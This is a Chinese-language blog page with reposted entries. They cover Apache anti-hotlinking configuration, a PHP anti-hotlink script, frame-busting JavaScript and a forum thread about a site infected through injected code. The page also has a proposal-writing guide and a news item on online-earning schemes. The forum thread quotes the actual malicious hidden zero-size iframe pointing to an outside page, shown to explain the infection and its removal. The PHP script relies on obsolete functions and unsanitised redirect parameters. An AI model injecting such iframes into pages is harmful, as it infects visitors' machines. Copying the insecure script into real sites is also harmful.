原著:http://bbs.ecshop.tw/thread-593-1-1.html

一.網站防盜連
首先,防盜連只防君子不防小人,所以認真說還是有辦法被破解
                在 Apache 中可以用 .htaccess 來做一些簡單的安全性、認證相關的設定。
開啟 httpd.conf 後,將下面這行修改一下,再新啟動 Apache
AllowOverride None 改成 AllowOverride All

防盜連常見方法一
轉自PCZONE
那麼請在.htaccess檔案加入下面
(以下這樣設定代表:除了自己網站以及PCZONE網站,其他網站仍無法盜連你站內的資料)
SetEnvIfNoCase Referer "^http://www\.pczone\.com\.tw/" local_ref=1
SetEnvIfNoCase Referer "^http://pczone\.com\.tw/" local_ref=1
SetEnvIfNoCase Referer "^http://自己網站/" local_ref=1
SetEnvIfNoCase Referer "^http://www\.google\.com/" local_ref=1
SetEnvIfNoCase Referer "^http://google\.com/" local_ref=1
<FilesMatch "\.(txt|doc|gif|jpg|mp3)"> 
Order Allow,Deny
Allow from env=local_ref
Allow from google.com
Allow from 127.0.0.1
Allow from 202.43.85.163 <-這個IP,是PCZONE網站的固定IP
</FilesMatch>

另一改 httpd.conf 方法
<Directory "C:/Apache2/htdocs/XXXXX">
SetEnvIfNoCase Referer "^http://www\.yahoo\.com\.tw" local_ref=1
<FilesMatch "\.(gif|jpg|wmv|wma|swf|rm|rmvb|mp3|mid|exe|zip)">
Order Allow,Deny
Allow from env=local_ref
Allow from 127.0.0.1
Allow from www.yahoo.com
Allow from www.yahoo.com.tw
</FilesMatch>
</Directory>

kuso.in/kuso/x.php 限制連 這個 php 不能直接連結.除了自己網站和yahoo
用 Location 來指出該檔案url 位置
<Location /kuso/x.php>
order allow,deny
Allow from 127.0.0.1
Allow from www.yahoo.com
Allow from www.yahoo.com.tw
......
</Location>

同理.封鎖特定的IP做這些設定
<FilesMatch "\.x">
order deny,allow
allow from all
deny from 192.168.1
deny from 192.168.2.1
</FilesMatch>


.htaccess 放的位置也會有差別,.htaccess 的作用範圍,只有放置該檔的目錄,以及其下的子目錄才會有作用。是目錄不是網址喔。如果其它的目錄已經有另外設定過權限的話,要檢查一下權限有沒有衝突。

下面是白話文-linux下 參考範例  轉自
更改前 這個是帶 rewrite 的
<VirtualHost *:80>
    DocumentRoot /home/www
    ServerName www.yourdomin.com
   <IfModule mod_rewrite.c>
    RewriteEngine On
    RewriteRule ^/supesite/([0-9]+)/spacelist(.*)$ /supesite/index.php?$1/action_spacelist$2
    RewriteRule ^/supesite/([0-9]+)/viewspace_(.+)$ /supesite/index.php?$1/action_viewspace_itemid_$2
    RewriteRule ^/supesite/([0-9]+)/viewbbs_(.+)$ /supesite/index.php?$1/action_viewbbs_tid_$2
    RewriteRule ^/supesite/([0-9]+)/(.*)$ /supesite/index.php?$1/$2
    RewriteRule ^/supesite/([0-9]+)$ /supesite/index.php?$1
    RewriteRule ^/supesite/action_(.+)$ /supesite/index.php?action_$1
    RewriteRule ^/supesite/category_(.+)$ /supesite/index.php?action_category_catid_$1
    RewriteRule ^/supesite/itemlist_(.+)$ /supesite/index.php?action_itemlist_catid_$1
    RewriteRule ^/supesite/viewnews_(.+)$ /supesite/index.php?action_viewnews_itemid_$1
    RewriteRule ^/supesite/viewthread_(.+)$ /supesite/index.php?action_viewthread_tid_$1
    RewriteRule ^/supesite/index([\.a-zA-Z0-9]*)$ /supesite/index.php
</IfModule>
</VirtualHost>

改完後
<VirtualHost *:80>
    DocumentRoot /home/www
    ServerName www.yourdomin.com
    SetEnvIfNoCase Referer "^http://www.yourdomin.com" local_ref=1
    SetEnvIfNoCase Referer "^http://yourdomin.com" local_ref=1
   <FilesMatch "\.(txt|doc|mp3|zip|rar|jpg|gif)">
       Order Allow,Deny
       Allow from env=local_ref
   </FilesMatch>
   <IfModule mod_rewrite.c>
    RewriteEngine On
    RewriteRule ^/supesite/([0-9]+)/spacelist(.*)$ /supesite/index.php?$1/action_spacelist$2
    RewriteRule ^/supesite/([0-9]+)/viewspace_(.+)$ /supesite/index.php?$1/action_viewspace_itemid_$2
    RewriteRule ^/supesite/([0-9]+)/viewbbs_(.+)$ /supesite/index.php?$1/action_viewbbs_tid_$2
    RewriteRule ^/supesite/([0-9]+)/(.*)$ /supesite/index.php?$1/$2
    RewriteRule ^/supesite/([0-9]+)$ /supesite/index.php?$1
    RewriteRule ^/supesite/action_(.+)$ /supesite/index.php?action_$1
    RewriteRule ^/supesite/category_(.+)$ /supesite/index.php?action_category_catid_$1
    RewriteRule ^/supesite/itemlist_(.+)$ /supesite/index.php?action_itemlist_catid_$1
    RewriteRule ^/supesite/viewnews_(.+)$ /supesite/index.php?action_viewnews_itemid_$1
    RewriteRule ^/supesite/viewthread_(.+)$ /supesite/index.php?action_viewthread_tid_$1
    RewriteRule ^/supesite/index([\.a-zA-Z0-9]*)$ /supesite/index.php
</IfModule>
</VirtualHost>

防盜連常見方法補充 ~另一種防盜方法
這種我還沒試過.有試過的請發表一下
租空間的用戶,透過Apache的.htaccess來設置防盜連功能(anti hotlink),是最方便的
RewriteEngine on
RewriteCond %{HTTP_REFERER} !^http://yblog.org/.*$ [NC]
RewriteCond %{HTTP_REFERER} !^http://yblog.org$ [NC]
RewriteCond %{HTTP_REFERER} !^http://www.yblog.org/.*$ [NC]
RewriteCond %{HTTP_REFERER} !^http://www.yblog.org$ [NC]
RewriteRule .*\.(jpg|gif|png|bmp|rar|zip|exe)$ /content/no_hotlink.jpeg [R,NC]
如果你想在自己的網站主機上也使用這樣的防盜連功能,生成一個.htaccess文件放到你欲限制的目錄(根目錄最好避免,在根目錄使用的. htaccess建議用作其它用途,欲限制的目錄下才放本文設定的防盜連方式)。在Windows平台上如果發現自己無法產生.htaccess文件,可 以用記事本或其它的文字編輯軟體,另存新檔時,檔名選擇.htaccess即可
RewriteCond可指定從哪些域名來連線是許可的
RewriteRule則指定哪些附檔名類型不能被盜連(hotlink),後面可指定連結到某個錯誤訊息頁面,或是一張圖片。
如果RewriteRule這一行設定成RewriteRule \.(jpg|jpeg|gif|png|bmp|rar|zip|exe)$ - [F],則表示盜連的人,會看到403錯誤訊息,顯示禁止存取(403 Forbidden)。

防盜連的PHP代碼[轉自163.com]
<?php

$ADMIN[defaulturl] = "http://www.163.com/404.htm";//盜鏈返回的地址
$okaysites = array("http://www.163.com/","http://163.com"); //白名單
$ADMIN[url_1] = "http://www.163.com/download/";//下載地點1
$ADMIN[url_2] = "";//下載地點2,以此類推

$reffer = $HTTP_REFERER;
if($reffer) {
$yes = 0;
while(list($domain, $subarray) = each($okaysites)) {
if (ereg($subarray,"$reffer")) {
$yes = 1;
}
}
$theu = "url"."_"."$site";
if ($ADMIN[$theu] AND $yes == 1) {
header("Location: $ADMIN[$theu]/$file");
} else {
header("Location: $ADMIN[defaulturl]");
}
} else {
header("Location: $ADMIN[defaulturl]");
}

?>  
使用方法:將上述代碼保存為dao4.php,
比如測試用的validatecode.rar在站點http://163.com/download裡面,
則用以下代碼表示下載連接.  
文件名?site=1&file=文件  
EXP:
 http://www.cndw.com/dao4.php?site=1&;file=validatecode.rar

防框架嵌入方法和源代碼 轉自
<script type="text/javascript"><!--
if ( top.location !== self.location ) {
top.location=self.location;
}
//--></script>唯一的缺點是對禁用Javascript的瀏覽器無效,不管怎麼樣這是我看到的最好的解決辦法,在這裡強烈推薦!


二.駭客攻擊(iframe)
先引用資安論壇網友:
這是我的網站,因為會員反應說有木馬程式,可是我和主機商一直找不出來,想請各位幫忙
會員幫我偵出來是Troian horse病毒。
昨天有會員反應被人植入木馬程式,檢看原始碼發現多了下面代碼
<iframe src="
http://www.photosh.idv.tw/admin/board/_vti_cnf/index.htm" width="0" height="0" frameborder="no" border="0" marginwidth="0" marginheight="0" scrolling="no"></iframe>

找了一些index.htm和index.php不過都找不到這段原始碼,請問它應該是放在哪裡呢?
and再多問一個,會員向我反應後我一邊找網站檔案還是仍然找不到,一邊掃我電腦的毒不過我用了兩三個掃木馬的程式還是都掃不出來?我的網站目前被惡意放 進的程式(如上面的代碼)還沒移除,我還是一直在我的網站上東看西看,不知是程式掃不出來還是沒有中毒?請問這種情形上去的話一定會中毒嗎?因為我也沒有 安裝任何防毒軟體,只有掃毒軟體。
我剛剛下載了一個檢測伺服器木馬及惡意程式的safe程式,放在網站上執行,它說99%可以找出惡意程式,但我使用後還是都說正常....這種情形該怎麼辦呢?主機商叫我從資料庫搜尋相關字眼但也找不到~麻煩高手幫忙一下~~QQ"

請您先把資料庫的所以密碼用英數亂碼加大小寫編碼...把密碼先改過一次...然後去看是那一個論壇..使用的是那一個資料庫...搜尋 </iframe> .....就會找到你說的那些資料了..看到多少全都砍了...
通常不會只發生在你現在這個資料庫而已...還會在你主機的另外的資料庫上...
只要你的網站夠熱門...就有人會想破你的資料庫植入以上的內崁式木馬...只要到你的論壇後...他會自動連結到別的網站..就中標了.....我有幫一位朋友開一個論壇...他的密碼太過簡單而被破後...接著就所有的資料庫都被植入類似的木碼網站..

<iframe是html的內置框架,也就是會讀對方的程式進來,不過他的高跟寬都設為0所以看不見,我也遇到,除了寫html檔之外可能會寫入flash檔,感染html或是asp相關網頁的檔案..

解析iFrame攻擊手法 .請參考這裡一篇文章 計世網

可能影響 -Google搜尋你的網站出現「這個網站可能會損害你的電腦」
當遇上網路釣魚.惡意網站連結...等同時,還可能遇到 Google搜尋出現「這個網站可能會損害你的電腦」情況
以下解決方式請自行到R大 的  慢條斯理的溫柔 去看 .雖然文中只提到遭到攻擊然後植入怪怪的連結.個人猜也許是iFrame攻擊手法 .不過也許不是.但是.遇到 Google搜尋出現「這個網站可能會損害你的電腦」這種情況 ..可ˇ以參考R大方式處理

backtrue 發表在 痞客邦 PIXNET 迴響(0) 引用(0) 人氣(188)

▲top
http://www.planning.com.tw/knowledge.html

如何寫出好的企劃書
瞧瞧台灣企劃塾執行長林俊廷的撇步

企劃能力在職場的重要性日漸提升,企劃力究竟要如何具備與養成呢? 活用11個撇步,讓你成為好的企劃人。

隨著知識化經濟時代來臨,「企劃力」成了一個人職場發展重要的能力之一,它不但產生新價值,更是一個組織的核心競爭力。上從組織領導到基層員工都需要培養企劃力。

台灣企劃塾執行長林俊廷,擁有十餘年專案實務企劃經驗。在1999年成立台灣企劃塾,專門講授企劃課程。林俊廷在行政院研考會、文建會、青輔會、華歌爾公司、板信銀行... ...都有講授企畫課程。

林俊廷指出,企畫並不是無緣無故發生,通常是有個需求被發掘、被發現。而企劃的精髓,就是要提出創造性的提案內容,來解決問題和達成目標。企劃是種說服的過程,而依份好的企劃書,必須包含以下幾個部份。

1、企劃案名稱
名稱是人們第一眼看到的部份,要寫得易懂有創意,而且不要太長。

2、緣起和目的
林俊廷指出,要設想企劃的目的或是想達成的價值何在。他舉例,在寫一個書展的企劃案前,要先問目的是什麼,若目標是提升讀書風氣,那書展是不是最好的方 式,辦定期讀書會會不會更好等問題。不斷反覆問自己,就不容易把目的和手段搞混。另外,「緣起」的內容要特別強調「WHY」的部份,在用上面的例子,一般 人可能只會提到為提升讀書風氣,所以決定舉辦書展。但為什麼要提升讀書風氣,也要特別說明。「要時時記得,企劃書是個說服性的文件,」林俊廷強調。

3、時間期限
一般而言這部份要為簡單。

4、活動地點
最好能夠附一張地圖,並說明鄰近地區交通狀況。

5、主協辦單位和贊助單位
這部份當然依活動性質而有不同的規則,但記得企劃書在未定稿前都可以改變。林俊廷指出,當洽詢的單位很多時,最好多印幾份,分別將它們的名稱印在最上面, 在列出其他單位,這除了表示尊重外,也讓對方知道他們是首選,但不是唯一的選擇。這讓對方接受的可能性提高一些。

6、行動方案
這是企劃書中的重頭戲。林俊廷建議,這部分不要用長篇大論式的陳述,而是要將各種行動方案的名稱標上號碼,先列表出來,再以粗黑字體強調,然後再接說明文 字;而說明的內文除了內容本身的方法描述外,還要強調獨特性、意義和價值,並且要與緣起環環相扣。例如-舉辦花蓮大理石應用觀摩活動。詳細內容如下... ...而這活動是為了讓民眾體驗大理石的創作樂趣。

在內容說明文字中,除了文字,最好也利用大量的圖表及照片,林俊廷認為,圖像符合人類記憶的儲存形式,他認為文不如表、表不如圖。例如用文字寫明贊助單位 的logo放置處外,最好再實際照一張相片,或用影像合成圖片的方式讓對方瞭解。「企劃販賣的是未來,所以要用盡可以讓對方理解的形式。」林俊廷強調。

7、流程進度
如果整個企劃內容歷時較長,而且有多項活動進行,最好是用圖表用橫座標標明日期,縱座標則是待辦事項,並用橫線來點出活動的歷時,這樣子就一目瞭然。「重 點仍在瞭解對方的專業領域,不要亂定行程,」林俊廷強調,好的企劃要充分瞭解對方專業和現實狀況,才不會寫出像「羅馬一天就可以造成」這樣企劃。

8、成本及預算
要列出項目、報價及計算方法。報價要注意詳實,不要誇大,也不要為了搶案列出不合理的低價。

9、預期效益
要儘量列出客觀化的數據指標,例如某活動不要光講可以提升企業形象,而要寫估計會有十家媒體報導。林俊廷也建議,對於效益要更有「想像力」,將效益再加以 延伸說明,打動閱讀者的心。例如十家媒體報導,表示至少有20萬人會看到這則新聞。

10、備案
只要列出人類難以掌握的部份,針對這個部份提出替代方案即可。

11、參考資料
這部份要提共詳實的資料,對前述內容作補充說明。假設企劃書中有提到去年有100家企業主管參加某活動,最好把這100家公司名稱整理表列出來,會更有說 服力。然而補充資料不是越多越好,而是要經過整哩,以方便觀看為原則。

企 劃需要的是多種能力的統合,」林俊廷指出,綜觀以上企劃書的撰寫,可以發現企劃要以人為本,用觀察力察覺對方真正需求和市場趨勢。而提出好的解決方案更是 需要創意,這是企劃的關鍵能力,也是產生創新價值的所在。寫企劃書只是依種表達形式,工作者必須加強自己的本職學能,以及學企劃所需的各種能力,才能成為 一個好的企劃人。

(刊載於 數位時代雙週刊 2004/10/1,Page 146~147)

backtrue 發表在 痞客邦 PIXNET 迴響(0) 引用(0) 人氣(221)

▲top
電子商務時報ECTime: 「網賺」熱潮,在台發燒

記者/林昭君

「網賺」成為網路賺錢的新趨勢,而這樣的風潮也逐漸在台灣蔓延起來。由於國外的「網賺」商機可觀,也促使著國內業者欲開發這塊新興的網路版圖,不論是寫部落格、填線上問卷,都已經成為一個新型態的賺錢方式。

由於現代人對於經營部落格的重視,造成各種不同興趣的社群聚集,分享、交流彼此的想法外,部落格不再是單純的社交媒體(social media),還有了「網賺」的可能。「Blog AD」是國內新興的網賺網站,網友加入其會員後,可將廣告放在自己的部落格,只要每被點閱一次,就可以賺取1.5至3元的費用。這樣的方式,不但使得部落客可以從中獲利,更讓廣告訊息可以針對其目標族群發揮作用。

另外,線上填問卷亦是熱門網賺的方式之一,如「波仕特線上市調網」就是線上問卷的網賺網站,其會針對企業或是廣告業者的需求,選擇適合的會員做為問卷的受訪者,而網友也可透過填寫問捲來賺取虛擬貨幣,再兌換為現金。目前此網站的會員人數高達17萬人,可見「網賺」的魅力逐漸發燒。

然而,有學者對於「網賺」市場採取保留的態度。中國文化大學新聞系莊伯仲認為「除非像有些網拍成為職業化的經營,全心全意的投入才有可能」。另外,由於台灣企業主對於市調的保守,以及台灣人對於市調的反感,加上資訊安全以及隱私上的考量與顧慮,都「網賺」經營的隱憂。


基本上我個人比較重視的是最後一段,我也不看好所謂的網賺市場,其實這根本不是所謂的「新趨勢」。這不過是很久之前就出現過的東西重新再拿出來炒作罷了。想要靠網路賺錢,除非你24hr坐在電腦前吧。

backtrue 發表在 痞客邦 PIXNET 迴響(0) 引用(0) 人氣(44)

▲top